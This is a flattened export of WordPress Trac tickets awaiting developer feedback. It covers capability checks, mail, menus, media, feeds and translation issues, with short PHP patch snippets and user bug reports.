[delete_private_pages] => 1 // [edit_private_pages] => 1 // [read_private_pages] => 1 // [delete_users] => 1 // [create_users] => 1 // [unfiltered_upload] => 1 // [edit_dashboard] => 1 // [update_plugins] => 1 // [delete_plugins] => 1 // [install_plugins] => 1 // [update_themes] => 1 // [install_themes] => 1 // [update_core] => 1 // [list_users] => 1 // [remove_users] => 1 // [promote_users] => 1 // [edit_theme_options] => 1 // [delete_themes] => 1 // [export] => 1 // [restrict_content] => 1 // [list_roles] => 1 // [administrator] => 1 // ) }}} Here we can see the Administrator user has the capability: {{{ // [install_plugins] => 1 // [activate_plugins] => 1 }}} But, When we check them with `current_user_can()` then both return false. After debugging in dept I found that the `do_not_allow` is set for the Non-super admin users for install_plugins capability. {{{ case 'update_plugins': case 'delete_plugins': case 'install_plugins': case 'upload_plugins': case 'update_themes': case 'delete_themes': case 'install_themes': case 'upload_themes': case 'update_core': ... } elseif ( is_multisite() && ! is_super_admin( $user_id ) ) { $caps[] = 'do_not_allow'; .... break; }}} Same for the activate_plugins the capabilities are set as `[""activate_plugins"",""manage_network_plugins""]` {{{ case 'activate_plugins': case 'deactivate_plugins': case 'activate_plugin': case 'deactivate_plugin': $caps[] = 'activate_plugins'; if ( is_multisite() ) { // update_, install_, and delete_ are handled above with is_super_admin(). $menu_perms = get_site_option( 'menu_items', array() ); if ( empty( $menu_perms['plugins'] ) ) { $caps[] = 'manage_network_plugins'; } } break; }}} So, Ideally only those capabilities need to return by `$current_user->get_role_caps()`. Those capabilities need to exclude from the list which current user cant perform. E.g. `do_not_allow`. " Mahesh901122 Future Releases 12682 Multiple password reset emails can be annoying Users 2.9.2 normal normal Future Release enhancement assigned dev-feedback 2010-03-23T15:51:01Z 2023-11-27T01:33:37Z "There's a security flaw mentioned in #10006: an attacker can bother users with password reset emails. The problem was reported on support forums by a user receiving hundreds of these emails. He proposed to introduce some kind of a timeout for password reset requests. Is it possible?" SergeyBiryukov Future Releases 9510 Multiple feed fixes and enhancements Feeds 2.7.1 normal major enhancement new dev-feedback 2009-04-11T09:36:47Z 2019-06-04T19:42:32Z Currently, the feed always returns the same subtitle, self link, alternate link and replies link no matter what the page type is. I think they should be different for each page type. peaceablewhale Future Releases 7098 Multiple entity codes in POT file for the same character chriscct7 I18N 2.5.1 normal normal Future Release enhancement reviewing dev-feedback 2008-06-05T11:33:12Z 2019-05-26T15:33:37Z "In the wordpress.pot file, two characters are represented by both their numbered and lettered HTML entities. These are: '''Em-dash:''' the POT file contains both — and — '''Right angle quote:''' the POT file contains both » and » I'm not sure if it matters but it certainly is a little inconsistent. " leuce Future Releases 44531 Multiple bytes decimal point and thousands separator in number_format_i18n PHP < 5.4 I18N normal normal Awaiting Review defect (bug) new dev-feedback 2018-07-06T10:33:04Z 2019-01-17T00:27:15Z "PHP `number_format` has only multiple bytes support in the decimal point and thousands separator parameters since PHP 5.4.0. There is some code in place in `wp-includes/class-wp-locale.php` to work around this: {{{#!php <?php if ( version_compare( PHP_VERSION, '5.4', '>=' ) ) { // Replace space with a non-breaking space to avoid wrapping. $thousands_sep = str_replace( ' ', ' ', $thousands_sep ); } else { // PHP < 5.4.0 does not support multiple bytes in thousands separator. $thousands_sep = str_replace( array( ' ', ' ' ), ' ', $thousands_sep ); } }}} Since we don't know how translators translate `number_format_thousands_sep` and `number_format_decimal_point` i don't think this is working in all cases. In the French translation files there is currently a multibyte non-breaking space char. Above code will not replace the multibyte non-breaking space char to a regular space. Also see: https://make.wordpress.org/polyglots/2013/06/24/number_format-bug/. https://translate.wordpress.org/projects/wp/4.8.x/fr/default?filters%5Bstatus%5D=either&filters%5Boriginal_id%5D=5138840&filters%5Btranslation_id%5D=51885045 " remcotolsma Future Releases 33967 MS Sites: content of the users column should be by choice, number is not too informative Networks and Sites 4.3 normal normal enhancement assigned dev-feedback 2015-09-22T13:43:11Z 2019-06-04T20:51:42Z "I sadly noticed, that on network admin -> sites, the users column only shows numbers now. It looks nicer with the less data, but on the other hand we used that information. I ask, it is possible to make it choosable, or at least, list the users in the excerpt listing mode? Why I ask this: We have a multisite install with many blogs and open registration. Because of that we sometimes have spam blogs. We frequently delete those spam blogs with its user(s), but now it's more complicated, because we don't see the email (user) at first. We have to open it on a new window (by clicking on the number of users). That slows down the process. And in some cases, just from the registered user (email) we saw if it was a spam blog or not." katazina Future Releases 36120 Move wp_*_link() functions into wp-includes General normal normal enhancement new dev-feedback 2016-03-05T14:51:04Z 2019-06-04T19:55:44Z "The following link functions live in `wp-admin/includes/bookmark.php`: * `wp_insert_link()` * `wp_delete_link()` * `wp_update_link()` I would like to propose that these three functions be moved into `wp-includes/bookmark.php` so that they are available on any request, and not just requests inside `wp-admin`. It would also be necessary to move the `wp_set_link_cats()` so that it is available inside the `wp_insert_link()` function. Other similar functions live in `wp-includes` already, such as `wp_insert_post()`, `wp_insert_commet()`, etc. This change would allow links to work in the same way as those other content types." JPry Future Releases 31039 Move retrieve_password() from wp-login.php SergeyBiryukov Login and Registration normal normal Future Release enhancement reviewing dev-feedback 2015-01-16T20:26:08Z 2021-02-02T12:35:36Z Once considered in #20279, I am able to propose a sane way to separate {{{retrieve_password()}}} from {{{wp-login.php}}}. jfarthing84 Future Releases 52188 Move Multisite settings page into tabs Networks and Sites normal normal Awaiting Review enhancement new dev-feedback 2020-12-29T17:27:55Z 2022-02-26T10:25:17Z "Hello all, In a multisite, the network settings page (/wp-admin/network/settings.php) is quiet long as we can see in wp-ms-network-settings.png and may be difficult to find a setting. My idea should be to split each section into tabs. " sebastienserre Future Releases 49644 Move logic from register_post_type() into WP_Post_Type->register() Posts, Post Types 5.4 normal normal Awaiting Review enhancement new dev-feedback 2020-03-13T16:12:45Z 2020-03-13T17:16:54Z "I have not looked at `register_post_type()` in several years, but was pleasantly surprised to find major improvements where most of the logic was refactored and moved to `WP_Post_Type`. Still though, it appears there are a few missing capabilities that a bit more refactoring would resolve. I propose we move most of the logic found in `register_post_type()` into `WP_Post_Type->register()` and a bit of the validation logic into `WP_Post_Type->__construct()` ''(see attached patch.)'' Similarly, it would make sense to also move the logic in `unregister_post_type()` to a `WP_Post_Type->unregister()`. One of the benefits of this change is that currently `register_post_type()` has validation logic but `WP_Post_Type->__construct()` does not so someone can call `new WP_Post_Type('this-is-a-far-too-long-post-type-name')` and not get an error and allow a too-long post type name to be registered whereas `register_post_type('this-is-a-far-too-long-post-type-name')` currently throw an error and not let the name through. With this change, but approaches would validate. The benefit of adding `WP_Post_Type->register()` and `WP_Post_Type->unregister()` is simply that those wanting to use the object to create their post types do not need to duplicate the logic in `register_post_type()`. The benefit of this is being able to write code like this and leverage PHP's validation of object property names: {{{#!php <?php $post_type = new WP_Post_Type('my_widget'); $post_type->label = __( 'Widgets', 'my_app' ); $post_type->public = true; $post_type->menu_icon = 'dashicons-admin-generic'; $post_type->register(); }}} Notice I added a backward-compatible additional parameter to the `unregistered_post_type` hook to indicate if the post type existed in `$wp_post_types` before the attempt to unregister it. AFAICT there will be no backward compatibility or documentation issues with this change, so this should be a slam-dunk, right? " MikeSchinkel Future Releases 29513 Move heavy lifting of wp_mail() to child class of PHPMailer Mail 4.0 normal normal Future Release enhancement new dev-feedback 2014-09-04T18:10:10Z 2020-09-16T18:59:53Z "If a plug-in is sending an e-mail, the class `PHPMailer` has a lot of useful methods (e.g. `addStringAttachment()`), but these are not available when using `wp_mail()`, which is a requirement to work with numerous other plug-ins owing to the hooks it triggers. `wp_mail()` does a number of things: 1. Instantiates a `PHPMailer` instance 2. Sets default values (e.g. ""from"" headers, charset, content type etc. ) 3. Parses the passed arguments and feeds it to the `PHPMalier` instance. 4. Executes a ""pre-send"" routine, (e.g. triggering hooks `wp_mail_from`, `phpmailer_init` etc) 5. Sends the e-mail The attached patch does a number of things: 1. Defines a `WPMailer` class ( a child of `PHPMailer`) 2. Defines a `WPMailerFactory` class which creates an instance with appropriate default values 3. Defines 'helper' methods which do the 'heavy lifting' of (3) above 4. Overrides the preSend method of PHPMailer to execute the 'pre-send routine' present in `wp_mail()` (i.e. (4) above) 5. Refactors `wp_mail()` to ""operate"" `WPMailer()` instance The result is that developers can either use `wp_mail()` or `$wpmailer = WPMailerFactory::getMailer()` to send e-mails, and both will behave identically (in terms of default values, and hooks being triggered), while maintaining backwards compatibility. This would also effectively close tickets #28407, #28059, #23291, #15539 , #11376 and maybe others. == Remarks == '''Why just not use `phpmailer_init`?''' This hook is very useful, but offers no context in which `wp_mail()` is called. As an example, suppose a plug-ins sends an e-mail with an ""on-the-fly"" purchase receipt attached. At `phpmailer_init` I don't know the purchase ID from which to generate and attach the receipt. '''Class/method naming standards''' I've used PHPMailer's naming standards which I understand conflicts slightly with WordPress' naming standards. A future iteration of this patch could well change this if that is deemed best. '''Global $phpmailer''' The global `$phpmailer` is redundant, as the factory creates a fresh instance for each request. Or at least it ''would''. The ''only'' reason the patch still uses this global, is that all the relevant unit tests pass without any further changes. Subject to this ticket being accepted in principle, these tests should be updated along with the patch. '''Backwards compatability''' Assuming `wp_mail()` hasn't been overriden by a plug-in/theme, then the is no change in behaviour. If it has been overridden, it's clear from the original function that the `$_GLOBAL['phpmailer']` should not be expected to exist, nor even the required classes to be loaded. As such they can be expected to operate independently of the changes made here, which are non-destructive. '''Uni tests''' For me, the mail group unit tests pass with 1 skipped. For some reason some tests failed (e.g. `Tests_DB::test_bail()`), but these failed even without this patch." stephenharris Future Releases 22164 "Move comment ""keyboard shortcuts"" setting to comments -> screen options" Comments normal normal enhancement new dev-feedback 2012-10-11T14:14:23Z 2019-06-04T19:23:27Z "Seems like it would make more sense to move the comment ""keyboard shortcuts"" setting from ""Your Profile"" to the screen options pane of edit-comments.php. Something like: [[Image(http://f.cl.ly/items/1k210Z2V1o0b350I1n0V/keyboard-shortcuts.jpg)]]" lessbloat Future Releases 31206 Move AJAX action parameters out of the method body and into the declaration. General 4.2 normal normal enhancement new dev-feedback 2015-02-01T23:09:49Z 2019-06-04T19:47:45Z "`admin-ajax.php` has several methods that require an `$action` parameter, then immediately set that parameter in the body of the method to the desired string if it's not set, which seems a bit counter-intuitive. I propose removing the conditional check completely (since it's not checking for a value, just the presence) and move the desired string into the method declaration as a default value." morganestes Future Releases 45558 Move _draft_or_post_title() from wp-admin/includes to wp-includes Editor 5.0 normal normal Future Release defect (bug) new dev-feedback 2018-12-09T21:47:23Z 2019-04-08T06:38:33Z "In the WordPress 5.0 release package, the `wp_latest_comments_draft_or_post_title()` and `render_block_core_latest_comments()` functions don't exist because they were overwritten during `npm install` in the build process. That's because the changes from https://github.com/WordPress/gutenberg/pull/12326 were manually added to core, before that PR was merged (which happened today). Instead, we have `gutenberg_draft_or_post_title()` and `gutenberg_render_block_core_latest_comments()` in core now. That's certainly less than ideal. Not only because the prefix is wrong, but also because `gutenberg_draft_or_post_title()` / `wp_latest_comments_draft_or_post_title()` duplicated the existing `_draft_or_post_title()` function. We should fix this as soon as possible, before people try to use `gutenberg_` prefixed functions in their projects. That function was duplicated in Gutenberg because they didn't want to include admin functions in front-end facing code, which makes sense. Suggested solution: 1. Move `_draft_or_post_title()` to `wp-includes/template.php` 2. In the `block-library` package in Gutenberg, rename `wp_latest_comments_draft_or_post_title()` / `gutenberg_draft_or_post_title()` from `latest-comments.php` to `_draft_or_post_title()` and add a `function_exists()` check. This way, nothing should break. 3. Use that function in `render_block_core_latest_comments()` Alternatively to step 2, Gutenberg should just bump the minimum WP version to 5.0.1, which makes sure the `_draft_or_post_title()` function is available at all times. Benefits: 1. No duplicated code. 2. No `gutenberg_` prefixes in core" swissspidy Future Releases 12295 More support to customize user profile edit page nacin* Users 3.0 normal normal Awaiting Review enhancement accepted dev-feedback 2010-02-19T21:14:01Z 2022-06-23T14:29:20Z "Right now I can edit the contact methods via the user_contactmethods filter, but I can not modify or remove the Personal Options or the Name Options. I want to keep the interface as simple as possible for my users, and I don't think that they need to edit this settings at all. If wp wants to be a cms, it should give me control over this aspect as well. At least, give me custom css-ids, so I can remove it via css!" pampfelimetten Future Releases 15565 More context for clean_post_cache() spacedmonkey Cache API 3.1 normal normal Future Release enhancement assigned dev-feedback 2010-11-24T17:41:07Z 2022-07-12T09:59:26Z "I'd like more context to be available when the clean_post_cache hook is run. Scenario: I have a plugin caches the post_IDs of most post queries that go through WP_Query. Invalidating that cache is done via the clean_post_cache hook, but requires a bunch of fragile hacks to prevent cache invalidation for things like comment inserts, which update the post's comment_count (which could, in theory, affect a WP_Query, but that's another story). Option 1: Add extra actions to provide context. This is the simpler option. Patch 1 does this for the above scenario. Option 2: Add an optional context parameter to clean_post_cache(). This is more general, but I can't think of anyplace else WordPress uses as similar approach. Patch two." mdawaffe Future Releases 12877 Modular themes: Apply template hierarchy to folders within a theme Themes normal normal feature request new dev-feedback 2010-04-06T16:26:15Z 2019-06-04T21:05:41Z "Applying template heirarchy to folders within a theme will allow themes to be broken into modules, allowing theme developers to substantially reduce repeated code. This is an automated, complete version of the use of get_template_part() in Twenty Ten. I've written posts on the [http://wp.me/pS0xt-1f justification for modular themes] and [http://wp.me/pS0xt-30 their potential to transform theme organization]. Based on [http://wp.me/pS0xt-3O my tests], these functions should cause no noticeable difference in performance. The patch has the added benefit of creating an accurate global $wp_template_hierarchy object (and a getter method), so any plugin/theme can access the template hierarchy for $wp_query. The patch introduces several new functions: get_template_module($folder), get_template_hierarchy(), update_template_hierarchy(), and 2 private functions. Finally, the patch also add a 'locate_template' filter on $template_names at the beginning of locate_template(), and turns the large conditional in template-loader.php into a function: template_loader()." koopersmith Future Releases 60084 Modify default value for x_redirected_by parameters General normal normal Awaiting Review enhancement new dev-feedback 2023-12-15T20:06:11Z 2023-12-15T20:06:11Z "Hello, The function `wp_redirect()`and `wp_safe_redirect()` are accepting a 3rd parameter `$x_redirected_by` which is by default `WordPress`. This 3rd parameter is really useful to debug redirection but only few plugins are using it. I only know Polylang, Yoast SEO and Redirection by John Godley which are using it. All other redirections made by a third party (theme or plugins) are signed `WordPress` which is misleading. I think we should change the default value to something more generic like `Not Signed` and add `WordPress`to the real redirections made by the Core. I do not really know how many redirections WordPress do but I think it would really help lots of developers." sebastienserre Future Releases 57678 Missing use of placeholders and $wpdb->prepare() Query normal major Awaiting Review defect (bug) new dev-feedback 2023-02-09T08:59:21Z 2023-02-27T06:51:26Z "Use placeholders and $wpdb->prepare(); found interpolated variable $prefix at ""SELECT $prefix"" **file path:** wordpress/wp-admin/setup-config.php **Line Number:** 325 " mahekkalola Future Releases 59586 Missing Features for FSE / Block Themes General 6.4 normal normal Awaiting Review enhancement new dev-feedback 2023-10-10T16:09:04Z 2023-10-10T16:09:04Z "With Classic themes there were some general options that all themes had. Moving from Classic themes to Block Themes users have to change some settings by going to General > Settings instead of going to Appearance Editor. Non tech-savvy users would benefit from having options built in core to change some generic site mods via the new user interface. The ones i am thinking of are : i) Site Title ii) Tagline iii) Site Logo iv) Favicon v) What to use for the Homepage " digamberpradhan Future Releases 24380 Missing Compression Parameter in WP_Image_Editor_GD wonderboymusic Media 3.5.1 normal normal enhancement reopened dev-feedback 2013-05-21T02:37:06Z 2019-10-05T10:24:33Z "Setting the image quality parameter has no effect on png files. Going through the wp-includes/class-wp-image-editor-gd.php I noticed that the compression parameter for the imagepng function call is missing. the current quality parameter only affects jpeg files. for jpeg, quality goes from 0->100 from bad to good for png, from 0->9 from good to bad. in the elseif block starting at line 337 i have added a variable called compression and changed the code as follow: {{{ elseif ( 'image/png' == $mime_type ) { // convert from full colors to index colors, like original PNG. if ( function_exists('imageistruecolor') && ! imageistruecolor( $image ) ) imagetruecolortopalette( $image, false, imagecolorstotal( $image ) ); $compression = -((9/100*$this->quality)-9); if ( ! $this->make_image( $filename, 'imagepng', array( $image, $filename, $compression ) ) ) return new WP_Error( 'image_save_error', __('Image Editor Save Failed') ); } }}} This convert the scale 0->100 into a 0->9 scale that matches the parameters from imaging. This gives back control to the user on image quality for png files..." MuViMoTV Future Releases 48187 Missing admin color scheme causes incorrect body class Administration normal normal Awaiting Review defect (bug) new dev-feedback 2019-09-30T19:49:02Z 2019-09-30T19:49:02Z "If you pick a non-core admin color scheme (one that is added via some available plugin) but later that color scheme is no longer available (by deactivating said plugin) the admin-area body class continues to reflect the now missing color scheme. To test: 1. Install and activate [https://wordpress.org/plugins/admin-color-schemes/ this plugin] (or one like it) 2. Change the color scheme in Your Profile to ""80's Kid"" (or any other non-core one) 3. Deactivate the above plugin 4. Open inspector in your web browser 5. See that the incorrect color scheme class is added to the body element Ironically, the way WordPress admin CSS is coded, this does not appear to cause any obvious styling breakage, though I do consider this an unintended behavior that can still be corrected." johnjamesjacoby Future Releases 57231 "Missing "":"" in strings with links." Text Changes normal normal Awaiting Review enhancement new dev-feedback 2022-11-30T07:20:41Z 2023-11-16T13:10:33Z "Personally, I think that strings with a link should have a "":"". To separate the actual sentence with the link. There are a few places where this doesn't happen. In this ticket/PR I'm going to change that." NekoJonez Future Releases 50823 Miss button add new post on page edit post (editor guttenberg) audrasjb* Editor 5.4.2 normal major Future Release feature request accepted dev-feedback 2020-07-31T03:04:15Z 2022-10-20T05:40:29Z "Hey guys, In the classic Editor when you were adding a post, you already had the button to add another one on the same screen and it speeds up the process a lot, please bring it back! (in red: add new)[[Image(https://prnt.sc/tpkyp8)]]" welitonmartins Future Releases 18474 Misleading error message when theme ZIP exceeds post_max_size Upload 3.2 normal normal Awaiting Review defect (bug) reopened dev-feedback 2011-08-18T16:16:03Z 2019-05-15T21:05:41Z "''post_max_size'' is 32MB, now try to uploading a 40MB big ZIP. You will get the ''Are you sure you want to do this? Please try again.'' message. But ''try again'' will not help. Notice: ''Warning: POST Content-Length of 47774864 bytes exceeds the limit of 33554432 bytes in Unknown on line 0''" ocean90 Future Releases 48769 meta_input, tax_input, tags_input and post_category arguments are not available in functions or methods hooked to wp_insert_post Posts, Post Types normal normal Awaiting Review enhancement new dev-feedback 2019-11-22T15:24:55Z 2020-01-02T02:12:39Z "Functions and methods hooked to `wp_insert_post` are currently passed `$post_ID`, `$post` and `$update`. When a call to `wp_insert_post()` is made we can pass an array argument. The array can have `meta_input`, `tax_input`, `tags_input` and `post_category` elements. Current call to `do_action()`: {{{ do_action( 'wp_insert_post', $post_ID, $post, $update ); }}} Proposal: {{{ do_action( 'wp_insert_post', $post_ID, $post, $update, $postarr ); }}} Thoughts: `$postarr` could be either the raw array passed to `wp_insert_post()` or the result of the raw array being merged with the set of defaults used. There are more hooks in the `wp_insert_post()` function such as `save_post`. These could be updated in the same way for consistency. " henry.wright Future Releases 44470 meta property=“og:image” doesn't register if an image is executed via a shortcode in WP Post and Pages Editor 4.9.6 normal critical Awaiting Review defect (bug) reopened dev-feedback 2018-06-27T03:28:41Z 2018-06-30T00:34:20Z "I want to try and explain a WordPress core issue and bug, in which I dont feel there is an available solution, at least I dont think after exhaustive research. I ran many many tests on fresh WP installations and twenty17 themes. And some may suggest this is a 3rd party plugin issue, while I am suggesting that it is both a Core and 3rd Party Plugin issue with the most widely used plugin in the world perhaps WPSEO. Applying shortcodes to WP post and Pages, of course it renders fine in the front-end, the output code that is. However, many recent updates to social media platforms Open Graph Protocols. The WPSEO plugin cannot understand that an image <img src=""file.jpg""> is being executed via php through a shortcode, unless the image is hard-coded directly into the WP page editor then it works fine. Problem is, no image executed from literally any 3rd party plugin shortcode contained within a wordpress post or page will execute the meta property=""og:image"" in the <head> .... In short WordPress Core does not support opengraph functions or plugins when shortcodes are being used. one of the last tests to try to continue to prove this is a WP core issue from their last several updates, that I am certainly of course trying to gain some attention on, that even an out of the box wordpress stock short codes like [gallery ids=""21""] to display images, cool enough that it displays visually in the post editor, still impossible to hook into the main property=og:image meta. Of course the other primary issue, no rhyme or reason either that a static front page cannot display the meta in the <head> either by any know third party plugin or hard coded functions in the theme directory. Being that exhaustive testing has been done, without the modification of stock wordpress core files, continues to lead me to believe that this is a core issue again. And after a lot of I intelligent research I believe wordpress next core update should fix this. Please read some other additional testing I have done on this issue as well. I am certainly trying to gain some attention to this issue because developers need to be able to execute php via shortcodes into wp post editors therefore execute images in a dynamic way via short codes and still be in compliance with al know third party plugins like yoasts og: settings and the social media platform og protocols. https://wordpress.stackexchange.com/questions/306973/property-ogimage-doesnt-register-with-including-a-php-file-as-a-shortcode-in" nlstm Future Releases 31559 Meta boxes should have before/after hooks General normal normal enhancement new dev-feedback 2015-03-07T20:38:33Z 2019-06-04T19:47:58Z "Currently there is no way to hook into an existing metabox. If I wanted to modify the featured image metabox (add a checkbox or something), I'd have to unregister the metabox, and re-register w/ my own callback. This is not good for compatibility w/ other plugins, etc. I propose before_callback and after_callback hooks for metaboxes. Basically, we'd replace this: {{{ echo '<div class=""inside"">' . ""\n""; call_user_func($box['callback'], $object, $box); echo ""</div>\n""; }}} with: {{{ echo '<div class=""inside"">' . ""\n""; do_action( 'before_metabox_callback', $object, $box ); do_action( ""before_{$box['id']}_metabox_callback"", $object, $box ); call_user_func($box['callback'], $object, $box); do_action( 'after_metabox_callback', $object, $box ); do_action( ""after_{$box['id']}_metabox_callback"", $object, $box ); echo ""</div>\n""; }}} " jtsternberg Future Releases 46232 "Merge or make-closer ""Customize"" and ""Edit {Thing}"" top-level toolbar items" Toolbar normal normal Awaiting Review enhancement new dev-feedback 2019-02-11T07:46:53Z 2023-05-10T00:07:14Z "As the lines start to blur between editing post-content and editing site-content, the purposes of the top-level toolbar ""Customize"" and ""Edit Post/Page"" type links is also. In a block-based world, the left-to-right order of these 2 links seems a bit odd: * Customize Site * Moderate Comments * Add New Stuff * Edit Thing Screenshot imminent." johnjamesjacoby Future Releases 40178 Menus that contain post types in Draft status should be hidden from logged out users General 4.7.3 normal normal Awaiting Review enhancement new dev-feedback 2017-03-16T23:39:44Z 2017-03-19T19:48:41Z "I recently added 2 pages to my site. I published them, and moved them into a Menu on my site. Then realized, I don't want them public, but I also don't want to lose their positioning where I put them in the menu. I moved them to draft. When I go to my site logged out, I still see the links and goes to a 404. I'm proposing that when an item in the Menu moves to a non-published state that isn't the Trash (Draft or Pending), it should remain in the nav, but be hidden from any logged out users." jdingman Future Releases 41583 Menus Administration screen, menu items are always loaded even when not needed Menus 4.8.1 normal normal Awaiting Review enhancement new dev-feedback 2017-08-07T22:04:44Z 2017-10-10T01:39:18Z On the Menus Administration screen menu items are always loaded. For performance, menu items should only be loaded when editing an existing menu and not on the locations tabs or when adding a new menu item. I've attached a patch that fixes this. webgeekconsulting Future Releases 28226 menu_page_url does not return correct URL on network admin Plugins 3.0 normal normal defect (bug) new dev-feedback 2014-05-12T18:54:57Z 2019-06-04T20:47:00Z the `menu_page_url` function calls `admin_url` to build the URL returned. it should check for network admin first and use `network_admin_url` if present norcross Future Releases 47657 Menu: In wp_link_pages() function add new args to wrap a tag Menus normal normal Awaiting Review feature request new dev-feedback 2019-07-06T00:33:05Z 2019-07-08T06:54:27Z "In the function `wp_link_pages()` the `$args` `link_before` and `link_after` are confusing for me. IMHO `link_before` should be before link. Because `pagelink` is for wrapping the text inside the link: `'pagelink' => '<span class=""test"">%</span>'` for example will be ’<a href=""…"" class=""…""><span class=""test"">3</span></a>’. But you can do the same thing with `'link_before' => '<span class=""test"">', 'link_after' => '</span>'`. If there are new `$args` params, `link_wrap_before` for example, would be much easier to create a bootstrap pagination for example. `$args = [ 'link_wrap_before' => '<li class=""list-item"">', 'link_wrap_after' => '</li>']` should output: `<li class=""list-item""><a href=""…"">…</a></li>`" sandrowuermli Future Releases 24146 Menu items with blank labels are removed on saving SergeyBiryukov* Menus 3.5.1 normal normal Future Release defect (bug) accepted dev-feedback 2013-04-20T22:10:09Z 2019-12-22T16:49:36Z "Hello, When edit an item of menu leaving the label in blank, the item is auto deleted. There are two problems in that: 1. I could need an item with blank title to add some class with an background image 2. When this item has subitems with two or more depth, all subitems are moved to first depth loosing submenus hierarchy. Moreover if i try to drag the subitems to make the hierarchy again, after save, all subitems come back to first depth. While i not change the depth of first item this issue occurs again. Best regards" rodrigo@… Future Releases 52558 Menu items need more classes Menus normal normal Awaiting Review defect (bug) new dev-feedback 2021-02-17T15:50:43Z 2021-02-17T17:36:21Z "As a front end engineer I have found that it is a pain to style menus. Especially if there are dropdowns. To target top level menu items you currently need to do nav > ul > li, and even then there can be issues. I would love to see a class on top level menu items. This way we can also style things with :not(.top-level-items) etc... Submenus have classes. Why cant top menu items have some too? Till now I have been able to get around it with filters like this. Unfortunately sometimes I am not given the ability to add this. {{{#!php <?php /** * @param $classes * @param $item * @param $depth * * https://developer.wordpress.org/reference/classes/walker_nav_menu/ * Add top-level-item to top level menu items for easier styling. * * @return array */ function ign_nav_menu_css_class( $classes, $item, $args, $depth ) { if ( $item->menu_item_parent == 0 ) { //Count top level menu items $classes[] = 'top-level-item'; } if ( $depth >= 2 ) { //Count top level menu items $classes[] = 'nested-menu-item'; } return $classes; } add_filter( 'nav_menu_css_class', 'ign_nav_menu_css_class', 10, 4 ); }}} At this point though it would be nice to have something like this in core. (I would also love to change the markup of the submenus so they can be easily turned into megamenus but I know thats not happening...) So...Thoughts? " ericgreenfield Future Releases 14969 "menu element ""all (direct) child pages""" Menus 3.0.1 normal normal feature request new dev-feedback 2010-09-26T20:16:39Z 2019-06-04T20:02:19Z One of the things I am missing in the current menu-system is the ability to assign parts of the page tree to, say, a sub-menu, so, say, all child pages of a parent will be listed instead of having to add them manually to the submenu once the menu has been created. youngmicroserf Future Releases 37586 Menu customizer: search results not properly filtered Customize 4.3 normal normal Future Release defect (bug) new dev-feedback 2016-08-05T16:36:50Z 2019-10-06T09:10:16Z "{{{customize_nav_menu_available_item_types}}} is a filter located in {{{class-wp-customize-nav-menus.php}}}. The purpouse of this filter is to restrict item types available in the Menu Customizer. This filter should be applied even if I perform a research using the search field in Menu Customizer. But this does not happens. While in Menu Customizer, doing a research, in search results shows up even items of specific types excluded with {{{customize_nav_menu_available_item_types}}} filter. We can resolve this issue using another filter always located in the same class: the {{{customize_nav_menu_searched_items}}} filter. With this filter we can restrict the selections of items received from the search result just before sending them to the frontend (ajax response). But this could be considered only a workaround and not a solution, because items should be filtered/excluded by type BEFORE wordpress performs the query to the database. We should suppose that, if we uses the {{{customize_nav_menu_available_item_types}}} to filter item types available on Menu Customizer, most likely we do not want search for elements of theese item types. " virgodesign Future Releases 50866 Media Uploader Blows Up File Sizes antpb Media 5.4.2 normal major Future Release defect (bug) assigned dev-feedback 2020-08-06T03:06:49Z 2022-04-27T05:49:21Z "Dear Developers, this is a flaw in the media uploader that is very simple to reproduce: create a 512x512 PNG image with best compression, make sure that your wordpress is set to create small, medium, and large versions of that image, set one of those versions to be also 512x512px, so when you upload a 512x512px image the media manager will create a copy of that image with the same size. upload the image. wordpress's uploader will not use the original 512x512px PNG image when this size is requested by a page, but instead it will use its own 512x512px image that it has created, and compare sizes - the media uploader's PNG image file is at least 3x-4x times bigger, and wordpress will use that bigger image file instead of the smaller original of the same dimensions, and better compression. Please, could you fix that? Thank you" hvar Future Releases 47529 Media manager doesn't display cropped images Media 4.9 normal normal defect (bug) reopened dev-feedback 2019-06-12T09:19:59Z 2019-06-14T14:59:22Z "Media manager doesn't display cropped images We should change the display to list mode to view cropped images " dedidata Future Releases 16165 Media Library Bulk Delete: Error in deleting... nacin Media 3.1 normal normal enhancement assigned dev-feedback 2011-01-09T14:20:39Z 2019-06-04T20:02:28Z "While Bulk Deletion, when a user gets the ""Error in deleting..."" message, there is no information given of how many elements have been deleted so far. Let's say there was a bulk of N deletions, getting this error can mean up to N-1 items have been deleted already. Same is the case if for some item, no permissions are granted to delete it. The number of successfully deleted items is missing as well." hakre Future Releases 23436 Media Gallery - Cropping Image and then Cropping a thumbnail from that crop doesn't work. joedolson* Media 3.5 normal normal Awaiting Review defect (bug) accepted close 2013-02-10T17:20:00Z 2022-12-07T16:05:48Z "'''A recipe for repeating the bug behavior:''' Navigate to Library in the admin sidebar. Click ""Add new"". Drag the 800x480 copy of this or any image to the drag and drop area: http://en.wikipedia.org/wiki/File:Cheese_platter.jpg (I suggest this image for ease of recipe duplication and best explanation.) After the blue status bar has completed, ""Edit"" to bring the media edit window up in a new tab. Click ""Edit Image"" below the actual image. Drag anywhere inside the image to create a cropping box. In the ""Image crop"" pane, set the crop area to 500px width, 100px height. Drag the cropping box so that the fancy toothpick is as far left as possible along the horizontal axis of the cropping box, but centered vertically. Click the ""Crop"" icon. Click ""Save"". Click ""Update"". Click ""Edit Image"" once again. Drag inside the newly-cropped image again to create a new cropping box. In the ""Image Crop"" pane, change the cropping dimensions to 150 x 100. Drag the box so the fancy toothpick is somewhere in the left third within the crop boundary. '''Important:''' In the thumbnail settings pane, set ""Apply Settings to:"" '''Thumbnail'''. Click the ""Crop"" icon. Click ""Save"". Click ""Update"". Click ""Library"" in the admin sidebar. The newly preferred thumbnail for our previously-cropped image does not save. Thumbnail remains default, based on center of previously-cropped image. Instead, you will see a small wheel of cheese sliced into six wedges with garnishes for the thumbnail, even though we chose the part with the fancy toothpick." gr33nman Future Releases 23398 "Media Gallery - Clicking ""Restore Original Image"" in ""Scale Image"" pane loses 'Thumbnail Settings' pane." Media 3.4 normal normal defect (bug) new dev-feedback 2013-02-05T21:11:36Z 2019-06-04T20:04:54Z "Reproduce the problem thusly: Click ""Edit image"" in the ""Edit Media"" interface for any image. `/wp-admin/post.php?post=1119&action=edit` Scale the image a couple times in the 'Scale Image' pane. Update. Click ""Restore Original Image"" in the 'Scale Image' pane. Try to crop just the thumbnail. The 'Thumbnail Settings' Pane is '''''gone'''''. The image has to be deleted and re-uploaded to gain thumbnail control once again." gr33nman Future Releases 37801 Media Functions Media normal normal Awaiting Review feature request new dev-feedback 2016-08-23T21:40:41Z 2019-04-19T20:04:28Z "I think now WordPress should include all media functions, like getMedaTitle($attID) getMedaCaption($attID) getMedaAlt($attID) 